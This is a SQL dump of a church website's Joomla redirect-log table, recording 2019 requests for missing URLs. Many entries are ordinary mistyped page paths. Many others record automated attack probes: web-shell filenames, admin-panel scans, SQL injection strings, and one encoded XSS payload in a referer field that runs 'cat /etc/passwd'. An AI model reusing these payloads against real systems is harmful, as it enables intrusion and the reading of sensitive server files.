(10583, 'https://www.lifeoasisinternationalchurch.org/index.php/mp3-messages/speaker/2-rev-olusola-ayodele-areogun/series', NULL, '', '', 2, 0, '2019-04-01 18:33:37', '0000-00-00 00:00:00', 301),
(10584, 'https://www.lifeoasisinternationalchurch.org/index.php/mp3-messages/speaker/2-rev-olusola-ayodele-areogun/sermons', NULL, '', '', 2, 0, '2019-04-01 18:33:38', '0000-00-00 00:00:00', 301),
(10585, 'https://lifeoasisinternationalchurch.org/a', NULL, '', '', 10, 0, '2019-04-02 09:15:59', '0000-00-00 00:00:00', 301),
(10586, 'https://lifeoasisinternationalchurch.org/terver-status', NULL, '', '', 3, 0, '2019-04-03 17:07:33', '0000-00-00 00:00:00', 301),
(10587, 'https://lifeoasisinternationalchurch.org/index.php/147-day-20', NULL, '', '', 1, 0, '2019-04-03 23:21:59', '0000-00-00 00:00:00', 301),
(10588, 'https://lifeoasisinternationalchurch.org/elfinder/php/connector.minimal.php', NULL, '', '', 2, 0, '2019-04-05 05:04:35', '0000-00-00 00:00:00', 301),
(10589, 'https://music.lifeoasisinternationalchurch.org//administrator//webconfig.txt.php', NULL, 'http://www.google.com.hk', '', 1, 0, '2019-04-05 19:12:01', '0000-00-00 00:00:00', 301),
(10590, 'https://www.lifeoasisinternationalchurch.org/e', NULL, '', '', 1, 0, '2019-04-07 09:25:55', '0000-00-00 00:00:00', 301),
(10591, 'https://www.lifeoasisinternationalchurch.org/ypoutube', NULL, '', '', 1, 0, '2019-04-07 10:02:19', '0000-00-00 00:00:00', 301),
(10592, 'https://142.4.21.132:443//ldskflks', NULL, '', '', 1, 0, '2019-04-08 08:19:09', '0000-00-00 00:00:00', 301),
(10593, 'https://142.4.21.132:443//login', NULL, '', '', 1, 0, '2019-04-08 08:19:10', '0000-00-00 00:00:00', 301),
(10594, 'https://lifeoasisinternationalchurch.org/index.php/173-day-9', NULL, '', '', 1, 0, '2019-04-08 17:50:37', '0000-00-00 00:00:00', 301),
(10595, 'https://lifeoasisinternationalchurch.org//statistik/start.php', NULL, '', '', 2, 0, '2019-04-11 18:25:17', '0000-00-00 00:00:00', 301),
(10596, 'https://lifeoasisinternationalchurch.org//menu/alias.php', NULL, '', '', 2, 0, '2019-04-11 18:25:18', '0000-00-00 00:00:00', 301),
(10597, 'https://lifeoasisinternationalchurch.org//upload/.082250.php', NULL, '', '', 2, 0, '2019-04-11 18:25:19', '0000-00-00 00:00:00', 301),
(10598, 'https://lifeoasisinternationalchurch.org//menu/.4e7f3d.php', NULL, '', '', 2, 0, '2019-04-11 18:25:20', '0000-00-00 00:00:00', 301),
(10599, 'https://lifeoasisinternationalchurch.org//upload/dump.php', NULL, '', '', 2, 0, '2019-04-11 18:25:21', '0000-00-00 00:00:00', 301),
(10600, 'https://lifeoasisinternationalchurch.org//statistik/.cca27f.php', NULL, '', '', 2, 0, '2019-04-11 18:25:22', '0000-00-00 00:00:00', 301),
(10601, 'https://lifeoasisinternationalchurch.org//xupx/db.php', NULL, '', '', 2, 0, '2019-04-11 18:40:42', '0000-00-00 00:00:00', 301),
(10602, 'https://lifeoasisinternationalchurch.org//js/flash/_cache.php', NULL, '', '', 2, 0, '2019-04-11 18:40:44', '0000-00-00 00:00:00', 301),
(10603, 'https://www.lifeoasisinternationalchurch.org/prevalent-streaming', NULL, '', '', 1, 0, '2019-04-11 21:27:40', '0000-00-00 00:00:00', 301),
(10604, 'https://www.lifeoasisinternationalchurch.org/prevalentstreaming', NULL, '', '', 1, 0, '2019-04-11 21:27:53', '0000-00-00 00:00:00', 301),
(10605, 'https://lifeoasisinternationalchurch.org/test386.php', NULL, '', '', 1, 0, '2019-04-12 07:48:38', '0000-00-00 00:00:00', 301),
(10606, 'https://lifeoasisinternationalchurch.org/dbadmin/', NULL, '', '', 4, 0, '2019-04-13 03:21:45', '0000-00-00 00:00:00', 301),
(10607, 'https://lifeoasisinternationalchurch.org/livesteaming', NULL, '', '', 1, 0, '2019-04-13 08:14:22', '0000-00-00 00:00:00', 301),
(10608, 'https://www.lifeoasisinternationalchurch.org/private/training', NULL, '', '', 2, 0, '2019-04-14 05:22:15', '0000-00-00 00:00:00', 301),
(10609, 'https://lifeoasisinternationalchurch.org/component/users/?view=reset&itemid=101', NULL, 'https://lifeoasisinternationalchurch.org/', '', 3, 0, '2019-04-15 04:47:21', '0000-00-00 00:00:00', 301),
(10610, 'https://142.4.21.132/vy94', NULL, '', '', 1, 0, '2019-04-17 05:45:12', '0000-00-00 00:00:00', 301),
(10611, 'https://www.lifeoasisinternationalchurch.org/mp3-messages/sermon/7-enemies-of-gods-word-1/', NULL, '', '', 6, 0, '2019-04-18 02:25:20', '0000-00-00 00:00:00', 301),
(10612, 'https://142.4.21.132/nmaplowercheck1555569979', NULL, '', '', 1, 0, '2019-04-18 06:46:26', '0000-00-00 00:00:00', 301),
(10613, 'https://142.4.21.132/libs/granite/core/content/login.html', NULL, '', '', 4, 0, '2019-04-18 08:40:41', '0000-00-00 00:00:00', 301),
(10614, 'https://142.4.21.132/admin', NULL, '', '', 4, 0, '2019-04-18 08:40:44', '0000-00-00 00:00:00', 301),
(10615, 'https://142.4.21.132/doesntexist-123', NULL, '', '', 4, 0, '2019-04-18 08:40:49', '0000-00-00 00:00:00', 301),
(10616, 'https://142.4.21.132/api', NULL, '', '', 4, 0, '2019-04-18 08:40:57', '0000-00-00 00:00:00', 301),
(10617, 'https://142.4.21.132/wp-json', NULL, '', '', 4, 0, '2019-04-18 08:41:01', '0000-00-00 00:00:00', 301),
(10618, 'https://142.4.21.132/doesntexist-78306745', NULL, '', '', 1, 0, '2019-04-18 08:41:25', '0000-00-00 00:00:00', 301),
(10619, 'https://142.4.21.132/def-78306745-doesntexist', NULL, '', '', 1, 0, '2019-04-18 08:41:27', '0000-00-00 00:00:00', 301),
(10620, 'https://www.binance.com/api/v1/ticker/bookticker?symbol=ethbtc', NULL, '', '', 2, 0, '2019-04-18 11:46:27', '0000-00-00 00:00:00', 301),
(10621, 'https://lifeoasisinternationalchurch.org/youtube*', NULL, '', '', 1, 0, '2019-04-19 12:23:01', '0000-00-00 00:00:00', 301),
(10622, 'https://www.lifeoasisinternationalchurch.org/ive-streaming', NULL, '', '', 2, 0, '2019-04-19 16:38:21', '0000-00-00 00:00:00', 301),
(10623, 'https://lifeoasisinternationalchurch.org/seo_script.php', NULL, '', '', 1, 0, '2019-04-20 14:42:37', '0000-00-00 00:00:00', 301),
(10624, 'https://142.4.21.132/api/v1/overview/default?filterby=&itemsperpage=10&name=&page=1&sortby=d,creationtimestamp', NULL, '', '', 2, 0, '2019-04-20 19:44:35', '0000-00-00 00:00:00', 301),
(10625, 'https://lifeoasisinternationalchurch.org/audiostreaming', NULL, '', '', 1, 0, '2019-04-21 06:55:15', '0000-00-00 00:00:00', 301),
(10626, 'https://lifeoasisinternationalchurch.org/wp-version.php', NULL, '', '', 1, 0, '2019-04-21 12:01:47', '0000-00-00 00:00:00', 301),
(10627, 'https://lifeoasisinternationalchurch.org/online-giving', NULL, '', '', 1, 0, '2019-04-21 13:05:14', '0000-00-00 00:00:00', 301),
(10628, 'https://lifeoasisinternationalchurch.org/wp-ajax-hook.php', NULL, '', '', 1, 0, '2019-04-22 00:47:41', '0000-00-00 00:00:00', 301),
(10629, 'https://lifeoasisinternationalchurch.org/foo\"><img src=', NULL, 'http://lifeoasisinternationalchurch.org/foo%22%3E%3Cimg%20src=#%20onerror=%22require%28%27child_process%27%29.exec%28%27cat%20/etc/passwd%27,%28error,%20stdout,%20stderr%29=%3E%7B%20alert%28%60stdout:%20$%7Bstdout%7D%60%29;%20%7D%29;%22%3E', '', 5, 0, '2019-04-23 22:58:40', '0000-00-00 00:00:00', 301),
(10630, 'https://lifeoasisinternationalchurch.org/system/storage/logs/seo_script.php', NULL, '', '', 1, 0, '2019-04-26 12:09:36', '0000-00-00 00:00:00', 301),
(10631, 'https://lifeoasisinternationalchurch.org/system/logs/seo_script.php', NULL, '', '', 1, 0, '2019-04-27 04:31:50', '0000-00-00 00:00:00', 301),
(10632, 'https://lifeoasisinternationalchurch.org/offeringtithe', NULL, '', '', 1, 0, '2019-04-27 11:00:25', '0000-00-00 00:00:00', 301),
(10633, 'https://lifeoasisinternationalchurch.org/st.php', NULL, '', '', 1, 0, '2019-04-29 00:18:06', '0000-00-00 00:00:00', 301),
(10634, 'https://lifeoasisinternationalchurch.org/soc2019', NULL, '', '', 63, 0, '2019-04-29 02:20:59', '0000-00-00 00:00:00', 301),
(10635, 'https://www.lifeoasisinternationalchurch.org//school of calling', NULL, '', '', 2, 0, '2019-04-30 10:53:18', '0000-00-00 00:00:00', 301),
(10636, 'https://www.lifeoasisinternationalchurch.org/soc2019', NULL, '', '', 54, 0, '2019-04-30 18:00:50', '0000-00-00 00:00:00', 301),
(10637, 'https://lifeoasisinternationalchurch.org/soc2019/wp-admin', NULL, '', '', 1, 0, '2019-05-01 16:08:39', '0000-00-00 00:00:00', 301),
(10638, 'https://www.lifeoasisinternationalchurch.org/don', NULL, '', '', 1, 0, '2019-05-02 03:27:19', '0000-00-00 00:00:00', 301),
(10639, 'https://142.4.21.132/api/v1/namespaces/kube-system/services/https:kubernetes-dashboard:/proxy/', NULL, '', '', 1, 0, '2019-05-02 19:13:35', '0000-00-00 00:00:00', 301),
(10640, 'https://lifeoasisinternationalchurch.org/streaminghttps://lifeoasisinternationalchurch.org/streaming', NULL, '', '', 1, 0, '2019-05-02 19:34:26', '0000-00-00 00:00:00', 301),
(10641, 'https://lifeoasisinternationalchurch.org/streaminghttp', NULL, '', '', 1, 0, '2019-05-02 19:35:04', '0000-00-00 00:00:00', 301),
(10642, 'https://www.lifeoasisinternationalchurch.org/my_special_message_which_maybe_very_long', NULL, '', '', 2, 0, '2019-05-03 06:20:06', '0000-00-00 00:00:00', 301),
(10643, 'https://142.4.21.132/db/', NULL, '', '', 2, 0, '2019-05-04 23:42:50', '0000-00-00 00:00:00', 301),
(10644, 'https://142.4.21.132/backup/', NULL, '', '', 2, 0, '2019-05-04 23:42:56', '0000-00-00 00:00:00', 301),
(10645, 'https://www.lifeoasisinternationalchurch.org/pivate', NULL, '', '', 1, 0, '2019-05-05 06:22:44', '0000-00-00 00:00:00', 301),
(10646, 'https://eagle.lifeoasisinternationalchurch.org/?itemid=1000', NULL, '', '', 2, 0, '2019-05-05 21:24:34', '0000-00-00 00:00:00', 301),
(10647, 'https://www.lifeoasisinternationalchurch.org/i', NULL, '', '', 1, 0, '2019-05-05 22:57:33', '0000-00-00 00:00:00', 301),
(10648, 'https://lifeoasisinternationalchurch.org/streamingli', NULL, '', '', 1, 0, '2019-05-06 05:03:22', '0000-00-00 00:00:00', 301),
(10649, 'https://142.4.21.132/index.php?option=com_ezautos&itemid=49&id=1&task=helpers&firstcode=1+and+0+union+select+1,2,md5(1),4,5,6,7--', NULL, 'http://www.baidu.com', '', 5, 0, '2019-05-06 10:08:10', '0000-00-00 00:00:00', 301),
(10650, 'https://lifeoasisinternationalchurch.org/component/k2/itemlist/tag', NULL, '', '', 2, 0, '2019-05-06 11:18:31', '0000-00-00 00:00:00', 301),
(10651, 'https://www.lifeoasisinternationalchurch.org/online-giving/visa-master', NULL, '', '', 20, 0, '2019-05-07 01:59:17', '0000-00-00 00:00:00', 301),
(10652, 'https://lifeoasisinternationalchurch.org/resources/live-str', NULL, '', '', 2, 0, '2019-05-08 07:41:08', '0000-00-00 00:00:00', 301),
(10653, 'https://lifeoasisinternationalchurch.org/resourc', NULL, '', '', 1, 0, '2019-05-08 07:41:27', '0000-00-00 00:00:00', 301),
(10654, 'https://www.lifeoasisinternationalchurch.org/myspecialmessage_whichmaybe_verylong_post__www_lifeoasisinternationalchurch_org', NULL, '', '', 1, 0, '2019-05-09 11:04:35', '0000-00-00 00:00:00', 301),
(10655, 'https://www.lifeoasisinternationalchurch.org/myspecialmessage_whichmaybe_verylong__www_lifeoasisinternationalchurch_org', NULL, '', '', 1, 0, '2019-05-09 19:01:30', '0000-00-00 00:00:00', 301),
(10656, 'https://lifeoasisinternationalchurch.org/ss/index.php?l=page_view&p=advanced_search', NULL, '', '', 18, 0, '2019-05-10 07:37:28', '0000-00-00 00:00:00', 301),
(10657, 'https://lifeoasisinternationalchurch.org/sunshop/index.php?l=page_view&p=advanced_search', NULL, '', '', 18, 0, '2019-05-10 07:37:30', '0000-00-00 00:00:00', 301),
(10658, 'https://lifeoasisinternationalchurch.org/35thanniv', NULL, '', '', 1, 0, '2019-05-10 15:15:24', '0000-00-00 00:00:00', 301),
(10659, 'https://lifeoasisinternationalchurch.org/streaminf', NULL, '', '', 1, 0, '2019-05-10 17:43:13', '0000-00-00 00:00:00', 301),
(10660, 'https://lifeoasisinternationalchurch.org/online-giving/visa-master', NULL, '', '', 8, 0, '2019-05-10 19:17:54', '0000-00-00 00:00:00', 301),
(10661, 'https://142.4.21.132/nmaplowercheck1557557057', NULL, '', '', 1, 0, '2019-05-11 06:44:20', '0000-00-00 00:00:00', 301),
(10662, 'https://142.4.21.132/index.php?option=com_gigcal&task=details&gigcal_bands_id=-1\' union all select 1,2,3,4,5,md5(3.1415),null,null,null,null,null,null,null#', NULL, 'http://www.baidu.com', '', 4, 0, '2019-05-11 13:08:19', '0000-00-00 00:00:00', 301),
(10663, 'https://www.lifeoasisinternationalchurch.org/live streeming', NULL, '', '', 1, 0, '2019-05-11 16:52:13', '0000-00-00 00:00:00', 301),
(10664, 'https://lifeoasisinternationalchurch.org/resources/36thanniversary', NULL, '', '', 1, 0, '2019-05-12 06:01:09', '0000-00-00 00:00:00', 301),
(10665, 'https://lifeoasisinternationalchurch.org/resources/36thanniversary/', NULL, '', '', 2, 0, '2019-05-12 06:01:25', '0000-00-00 00:00:00', 301),
(10666, 'https://lifeoasisinternationalchurch.org/36anniversary', NULL, '', '', 1, 0, '2019-05-12 10:00:57', '0000-00-00 00:00:00', 301),
(10667, 'https://www.lifeoasisinternationalchurch.org/resources/live-str', NULL, '', '', 1, 0, '2019-05-12 17:07:12', '0000-00-00 00:00:00', 301),
(10668, 'https://lifeoasisinternationalchurch.org/cdn-cgi/trace', NULL, '', '', 1, 0, '2019-05-15 23:56:09', '0000-00-00 00:00:00', 301),
(10669, 'https://lifeoasisinternationalchurch.org/big.php', NULL, '', '', 1, 0, '2019-05-16 04:03:08', '0000-00-00 00:00:00', 301),
(10670, 'https://lifeoasisinternationalchurch.org/sql.php', NULL, '', '', 1, 0, '2019-05-16 04:03:09', '0000-00-00 00:00:00', 301),
(10671, 'https://www.lifeoasisinternationalchurch.org/contact-us/livestreaming', NULL, '', '', 1, 0, '2019-05-16 05:31:36', '0000-00-00 00:00:00', 301),
(10672, 'https://lifeoasisinternationalchurch.org/streaminge', NULL, '', '', 1, 0, '2019-05-16 06:47:10', '0000-00-00 00:00:00', 301),
(10673, 'https://www.lifeoasisinternationalchurch.org///xmlrpc.php', NULL, 'http://www.google.com.hk', '', 1, 0, '2019-05-16 09:36:52', '0000-00-00 00:00:00', 301),
(10674, 'https://www.lifeoasisinternationalchurch.org/partnership/22-joomla/11-music-is-food-for-the-soul', NULL, '', '', 2, 0, '2019-05-16 15:03:08', '0000-00-00 00:00:00', 301),
(10675, 'https://www.lifeoasisinternationalchurch.org/vacancies', NULL, '', '', 2, 0, '2019-05-18 03:40:36', '0000-00-00 00:00:00', 301),
(10676, 'https://www.lifeoasisinternationalchurch.org/?itemid=1000((\'.,.', NULL, '', '', 1, 0, '2019-05-18 07:53:44', '0000-00-00 00:00:00', 301),
(10677, 'https://lifeoasisinternationalchurch.org/outreaches', NULL, '', '', 1, 0, '2019-05-18 07:56:49', '0000-00-00 00:00:00', 301),
(10678, 'https://lifeoasisinternationalchurch.org/trainimg', NULL, '', '', 1, 0, '2019-05-19 05:32:30', '0000-00-00 00:00:00', 301),
(10679, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_kunena', NULL, '', '', 1, 0, '2019-05-19 08:16:12', '0000-00-00 00:00:00', 301),
(10680, 'https://lifeoasisinternationalchurch.org/_profiler/phpinfo', NULL, 'http://lifeoasisinternationalchurch.org/_profiler/phpinfo', '', 1, 0, '2019-05-22 18:48:55', '0000-00-00 00:00:00', 301),
(10681, 'https://www.lifeoasisinternationalchurch.org/streaming y', NULL, '', '', 1, 0, '2019-05-24 08:20:54', '0000-00-00 00:00:00', 301),
(10682, 'https://lifeoasisinternationalchurch.org/online-giving/visa-master/', NULL, '', '', 3, 0, '2019-05-25 01:23:37', '0000-00-00 00:00:00', 301),
(10683, 'https://mail.lifeoasisinternationalchurch.org/ss/index.php?l=page_view&p=advanced_search', NULL, '', '', 1, 0, '2019-05-25 14:00:42', '0000-00-00 00:00:00', 301),
(10684, 'https://mail.lifeoasisinternationalchurch.org/sunshop/index.php?l=page_view&p=advanced_search', NULL, '', '', 1, 0, '2019-05-25 14:00:47', '0000-00-00 00:00:00', 301),
(10685, 'https://lifeoasisinternationalchurch.org/resources.org/training', NULL, '', '', 2, 0, '2019-05-26 05:38:26', '0000-00-00 00:00:00', 301),
(10686, 'https://142.4.21.132/mapi/api', NULL, '', '', 1, 0, '2019-05-28 04:17:18', '0000-00-00 00:00:00', 301),
(10687, 'https://mail.lifeoasisinternationalchurch.org/component/k2/itemlist/tag/pregnantwomen', NULL, '', '', 1, 0, '2019-05-28 09:15:37', '0000-00-00 00:00:00', 301),
(10688, 'https://mail.lifeoasisinternationalchurch.org/component/k2/itemlist/tag/lastdays', NULL, '', '', 1, 0, '2019-05-28 09:16:20', '0000-00-00 00:00:00', 301),
(10689, 'https://mail.lifeoasisinternationalchurch.org/component/k2/itemlist/tag/holyspirit', NULL, '', '', 1, 0, '2019-05-28 09:17:03', '0000-00-00 00:00:00', 301),
(10690, 'https://mail.lifeoasisinternationalchurch.org/component/k2/itemlist/tag/correctchristian', NULL, '', '', 1, 0, '2019-05-28 09:17:08', '0000-00-00 00:00:00', 301),
(10691, 'https://www.lifeoasisinternationalchurch.org/streaminh', NULL, '', '', 1, 0, '2019-05-28 18:29:09', '0000-00-00 00:00:00', 301),
(10692, 'https://lifeoasisinternationalchurch.org/go', NULL, '', '', 2, 0, '2019-05-29 11:27:27', '0000-00-00 00:00:00', 301),
(10693, 'https://lifeoasisinternationalchurch.org/minister/hotel/', NULL, '', '', 3, 0, '2019-05-30 02:13:18', '0000-00-00 00:00:00', 301),
(10694, 'https://lifeoasisinternationalchurch.org/minister/wow-manuals/', NULL, '', '', 3, 0, '2019-05-30 02:13:41', '0000-00-00 00:00:00', 301),
(10695, 'https://lifeoasisinternationalchurch.org/comp', NULL, 'https://lifeoasisinternationalchurch.org/', '', 3, 0, '2019-05-30 14:22:46', '0000-00-00 00:00:00', 301),
(10696, 'https://lifeoasisinternationalchurch.org/gobc2019', NULL, '', '', 1, 0, '2019-05-30 21:14:06', '0000-00-00 00:00:00', 301),
(10697, 'https://www.lifeoasisinternationalchurch.org/?option=com_user&view=registration', NULL, '', '', 11, 0, '2019-05-31 22:12:29', '0000-00-00 00:00:00', 301),
(10698, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_user&view=user&task=edit', NULL, '', '', 4, 0, '2019-06-01 02:11:37', '0000-00-00 00:00:00', 301),
(10699, 'https://lifeoasisinternationalchurch.org/__media__/js/netsoltrademark.php?d=alpxxx.com', NULL, '', '', 3, 0, '2019-06-02 08:49:19', '0000-00-00 00:00:00', 301),
(10700, 'https://lifeoasisinternationalchurch.org/resources/live-streamingl', NULL, '', '', 1, 0, '2019-06-02 09:09:13', '0000-00-00 00:00:00', 301),
(10701, 'https://mail.lifeoasisinternationalchurch.org/connectors/system/phpthumb.php', NULL, '', '', 1, 0, '2019-06-04 18:21:24', '0000-00-00 00:00:00', 301),
(10702, 'https://lifeoasisinternationalchurch.org/wp-content/uploads', NULL, '', '', 1, 0, '2019-06-04 19:55:00', '0000-00-00 00:00:00', 301),
(10703, 'https://lifeoasisinternationalchurch.org/gobc201', NULL, '', '', 1, 0, '2019-06-06 12:11:32', '0000-00-00 00:00:00', 301),
(10704, 'https://lifeoasisinternationalchurch.org/gobc2', NULL, '', '', 1, 0, '2019-06-06 12:11:32', '0000-00-00 00:00:00', 301),
(10705, 'https://lifeoasisinternationalchurch.org/g', NULL, '', '', 1, 0, '2019-06-06 12:11:32', '0000-00-00 00:00:00', 301),
(10706, 'https://lifeoasisinternationalchurch.org/gob', NULL, '', '', 3, 0, '2019-06-06 12:11:32', '0000-00-00 00:00:00', 301),
(10707, 'https://lifeoasisinternationalchurch.org/gobc20', NULL, '', '', 1, 0, '2019-06-06 12:11:32', '0000-00-00 00:00:00', 301),
(10708, 'https://lifeoasisinternationalchurch.org/cc', NULL, '', '', 1, 0, '2019-06-06 17:14:04', '0000-00-00 00:00:00', 301),
(10709, 'https://mail.lifeoasisinternationalchurch.org/libs/granite/core/content/login.html', NULL, '', '', 3, 0, '2019-06-07 00:26:50', '0000-00-00 00:00:00', 301),
(10710, 'https://mail.lifeoasisinternationalchurch.org/admin', NULL, '', '', 3, 0, '2019-06-07 00:26:59', '0000-00-00 00:00:00', 301),
(10711, 'https://mail.lifeoasisinternationalchurch.org/doesntexist-123', NULL, '', '', 3, 0, '2019-06-07 00:27:01', '0000-00-00 00:00:00', 301),
(10712, 'https://mail.lifeoasisinternationalchurch.org/api', NULL, '', '', 3, 0, '2019-06-07 00:27:09', '0000-00-00 00:00:00', 301),
(10713, 'https://mail.lifeoasisinternationalchurch.org/wp-json', NULL, '', '', 3, 0, '2019-06-07 00:27:11', '0000-00-00 00:00:00', 301),
(10714, 'https://mail.lifeoasisinternationalchurch.org/doesntexist-56484025', NULL, '', '', 1, 0, '2019-06-07 00:33:05', '0000-00-00 00:00:00', 301),
(10715, 'https://mail.lifeoasisinternationalchurch.org/def-56484025-doesntexist', NULL, '', '', 1, 0, '2019-06-07 00:33:07', '0000-00-00 00:00:00', 301),
(10716, 'https://mail.lifeoasisinternationalchurch.org/server-status', NULL, '', '', 2, 0, '2019-06-07 00:35:32', '0000-00-00 00:00:00', 301),
(10717, 'https://142.4.21.132/doesntexist-4654408', NULL, '', '', 1, 0, '2019-06-07 00:50:25', '0000-00-00 00:00:00', 301),
(10718, 'https://142.4.21.132/def-4654408-doesntexist', NULL, '', '', 1, 0, '2019-06-07 00:50:27', '0000-00-00 00:00:00', 301),
(10719, 'https://eagle.lifeoasisinternationalchurch.org/libs/granite/core/content/login.html', NULL, '', '', 3, 0, '2019-06-07 00:57:09', '0000-00-00 00:00:00', 301),
(10720, 'https://eagle.lifeoasisinternationalchurch.org/admin', NULL, '', '', 3, 0, '2019-06-07 00:57:33', '0000-00-00 00:00:00', 301),
(10721, 'https://eagle.lifeoasisinternationalchurch.org/doesntexist-123', NULL, '', '', 3, 0, '2019-06-07 00:57:45', '0000-00-00 00:00:00', 301),
(10722, 'https://eagle.lifeoasisinternationalchurch.org/wp-json', NULL, '', '', 3, 0, '2019-06-07 00:59:11', '0000-00-00 00:00:00', 301),
(10723, 'https://eagle.lifeoasisinternationalchurch.org/doesntexist-94369515', NULL, '', '', 1, 0, '2019-06-07 01:00:22', '0000-00-00 00:00:00', 301),
(10724, 'https://eagle.lifeoasisinternationalchurch.org/api', NULL, '', '', 1, 0, '2019-06-07 01:41:23', '0000-00-00 00:00:00', 301),
(10725, 'https://music.lifeoasisinternationalchurch.org/soc2019', NULL, '', '', 5, 0, '2019-06-07 13:44:41', '0000-00-00 00:00:00', 301),
(10726, 'https://lifeoasisinternationalchurch.org/pric', NULL, '', '', 1, 0, '2019-06-07 20:30:57', '0000-00-00 00:00:00', 301),
(10727, 'https://lifeoasisinternationalchurch.org/pricaye', NULL, '', '', 1, 0, '2019-06-07 20:30:57', '0000-00-00 00:00:00', 301),
(10728, 'https://lifeoasisinternationalchurch.org/pricay', NULL, '', '', 1, 0, '2019-06-07 20:30:58', '0000-00-00 00:00:00', 301),
(10729, 'https://lifeoasisinternationalchurch.org/prica', NULL, '', '', 1, 0, '2019-06-07 20:30:58', '0000-00-00 00:00:00', 301),
(10730, 'https://lifeoasisinternationalchurch.org/bacot.php', NULL, 'http://site.ru', '', 2, 0, '2019-06-08 13:51:35', '0000-00-00 00:00:00', 301),
(10731, 'https://lifeoasisinternationalchurch.org/master.php', NULL, 'http://site.ru', '', 2, 0, '2019-06-08 15:28:03', '0000-00-00 00:00:00', 301),
(10732, 'https://lifeoasisinternationalchurch.org/.ftp.php', NULL, 'http://site.ru', '', 1, 0, '2019-06-08 20:40:20', '0000-00-00 00:00:00', 301),
(10733, 'https://lifeoasisinternationalchurch.org/meta.php', NULL, 'http://site.ru', '', 1, 0, '2019-06-08 21:00:35', '0000-00-00 00:00:00', 301),
(10734, 'https://lifeoasisinternationalchurch.org/gprivate', NULL, '', '', 1, 0, '2019-06-09 07:40:12', '0000-00-00 00:00:00', 301),
(10735, 'https://www.lifeoasisinternationalchurch.org/gobc19', NULL, '', '', 3, 0, '2019-06-09 08:53:33', '0000-00-00 00:00:00', 301),
(10736, 'https://lifeoasisinternationalchurch.org/wp-blogs.php', NULL, 'http://site.ru', '', 1, 0, '2019-06-09 10:41:13', '0000-00-00 00:00:00', 301),
(10737, 'https://lifeoasisinternationalchurch.org/gobc2009', NULL, '', '', 2, 0, '2019-06-09 10:41:50', '0000-00-00 00:00:00', 301),
(10738, 'https://lifeoasisinternationalchurch.org/dhon.php', NULL, 'http://site.ru', '', 2, 0, '2019-06-09 14:32:16', '0000-00-00 00:00:00', 301),
(10739, 'https://lifeoasisinternationalchurch.org/wp-updats.php', NULL, 'http://site.ru', '', 1, 0, '2019-06-09 14:56:54', '0000-00-00 00:00:00', 301),
(10740, 'https://lifeoasisinternationalchurch.org/mini.php', NULL, 'http://site.ru', '', 3, 0, '2019-06-09 15:02:00', '0000-00-00 00:00:00', 301),
(10741, 'https://www.lifeoasisinternationalchurch.org/gob', NULL, '', '', 3, 0, '2019-06-09 15:28:22', '0000-00-00 00:00:00', 301),
(10742, 'https://lifeoasisinternationalchurch.org/a.php', NULL, 'http://site.ru', '', 2, 0, '2019-06-09 17:17:04', '0000-00-00 00:00:00', 301),
(10743, 'https://lifeoasisinternationalchurch.org/yusa.php', NULL, 'http://site.ru', '', 2, 0, '2019-06-10 07:37:30', '0000-00-00 00:00:00', 301),
(10744, 'https://lifeoasisinternationalchurch.org/seter.php', NULL, 'http://site.ru', '', 2, 0, '2019-06-10 08:28:13', '0000-00-00 00:00:00', 301),
(10745, 'https://lifeoasisinternationalchurch.org/systems.php', NULL, 'http://site.ru', '', 1, 0, '2019-06-10 14:03:01', '0000-00-00 00:00:00', 301),
(10746, 'https://lifeoasisinternationalchurch.org/mhbgf.php', NULL, 'http://site.ru', '', 1, 0, '2019-06-10 15:06:02', '0000-00-00 00:00:00', 301),
(10747, 'https://lifeoasisinternationalchurch.org/wp-cofigs.php', NULL, 'http://site.ru', '', 3, 0, '2019-06-10 22:28:26', '0000-00-00 00:00:00', 301),
(10748, 'https://lifeoasisinternationalchurch.org/resources/blog/item', NULL, '', '', 1, 0, '2019-06-12 04:13:31', '0000-00-00 00:00:00', 301),
(10749, 'https://lifeoasisinternationalchurch.org/doc.php', NULL, 'http://site.ru', '', 3, 0, '2019-06-12 17:04:43', '0000-00-00 00:00:00', 301),
(10750, 'https://lifeoasisinternationalchurch.org/text.php', NULL, 'http://site.ru', '', 5, 0, '2019-06-12 20:12:26', '0000-00-00 00:00:00', 301),
(10751, 'https://lifeoasisinternationalchurch.org/network.php', NULL, 'http://site.ru', '', 2, 0, '2019-06-12 22:18:30', '0000-00-00 00:00:00', 301),
(10752, 'https://lifeoasisinternationalchurch.org/sitemap.php', NULL, 'http://site.ru', '', 1, 0, '2019-06-12 22:28:31', '0000-00-00 00:00:00', 301),
(10753, 'https://lifeoasisinternationalchurch.org/esjfglis.php', NULL, 'http://site.ru', '', 1, 0, '2019-06-13 00:39:21', '0000-00-00 00:00:00', 301),
(10754, 'https://lifeoasisinternationalchurch.org/temp1-1.php', NULL, 'http://site.ru', '', 1, 0, '2019-06-13 01:52:07', '0000-00-00 00:00:00', 301),
(10755, 'https://lifeoasisinternationalchurch.org/backup/meuhy.php', NULL, 'http://site.ru', '', 2, 0, '2019-06-13 03:06:23', '0000-00-00 00:00:00', 301),
(10756, 'https://142.4.21.132/agentui.php', NULL, '', '', 1, 0, '2019-06-13 21:45:16', '0000-00-00 00:00:00', 301),
(10757, 'https://lifeoasisinternationalchurch.org/gobcx2019/', NULL, '', '', 1, 0, '2019-06-14 00:51:18', '0000-00-00 00:00:00', 301),
(10758, 'https://lifeoasisinternationalchurch.org/wp/logo_img.php', NULL, 'http://site.ru', '', 2, 0, '2019-06-14 09:31:12', '0000-00-00 00:00:00', 301),
(10759, 'https://lifeoasisinternationalchurch.org/freshrdp.com2.php', NULL, 'http://site.ru', '', 1, 0, '2019-06-14 11:50:41', '0000-00-00 00:00:00', 301),
(10760, 'https://lifeoasisinternationalchurch.org/resources/vod/', NULL, '', '', 2, 0, '2019-06-15 02:15:08', '0000-00-00 00:00:00', 301),
(10761, 'https://lifeoasisinternationalchurch.org/t/', NULL, '', '', 2, 0, '2019-06-15 02:15:13', '0000-00-00 00:00:00', 301),
(10762, 'https://eagle.lifeoasisinternationalchurch.org/soc2019', NULL, '', '', 3, 0, '2019-06-15 05:33:06', '0000-00-00 00:00:00', 301);
INSERT INTO `y57u5_redirect_links` (`id`, `old_url`, `new_url`, `referer`, `comment`, `hits`, `published`, `created_date`, `modified_date`, `header`) VALUES
(10763, 'https://mail.lifeoasisinternationalchurch.org/gobc2017/', NULL, '', '', 2, 0, '2019-06-15 06:23:08', '0000-00-00 00:00:00', 301),
